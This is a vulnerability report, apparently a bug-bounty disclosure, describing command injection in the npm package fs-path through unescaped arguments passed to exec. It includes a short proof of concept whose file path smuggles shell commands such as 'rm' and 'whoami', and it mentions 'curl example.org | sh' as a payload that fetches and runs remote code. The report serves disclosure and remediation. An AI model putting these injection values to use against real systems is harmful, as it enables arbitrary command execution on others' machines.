I would like to report command injection in fs-path
.
It allows to inject and execute arbitrary shell commands while performing various operations from fs-path
API like copying files.
module name: fs-path
version:0.0.24npm page: https://www.npmjs.com/package/fs-path
> Useful file utitiles.
108 downloads in the last day
2 916 downloads in the last week
13 186 downloads in the last month
Arguments are not properly escaped before being concatenated into the command that is passed to exec()
/execSync()
.
See https://github.com/pillys/fs-path/blob/master/lib/index.js
const fsPath = require('fs-path');
const source = '/bin/ls';
const target = '/tmp/foo;rm\t/tmp/foo;whoami>\t/tmp/bar';
fsPath.copySync(source, target);
Observe /tmp/bar
being created with whoami
output.
The same issue affects other methods in fs-path
API, not just copySync
.
The suggested fix is to avoid using exec
/execSync
and instead pass parameters as an array of arguments to corresponding child_process
methods.
For setups where user input could end up in arguments of calls to fs-wrap
API (like filename etc), users would be able to execute arbitrary shell commands.
Note that sanitization of user input on the application side might not prevent this issue, as simple path sanitization that removes stuff /
and ..
is not enough — commands like curl example.org | sh
might pass through sanitization of user input (like filenames etc.) on the application side.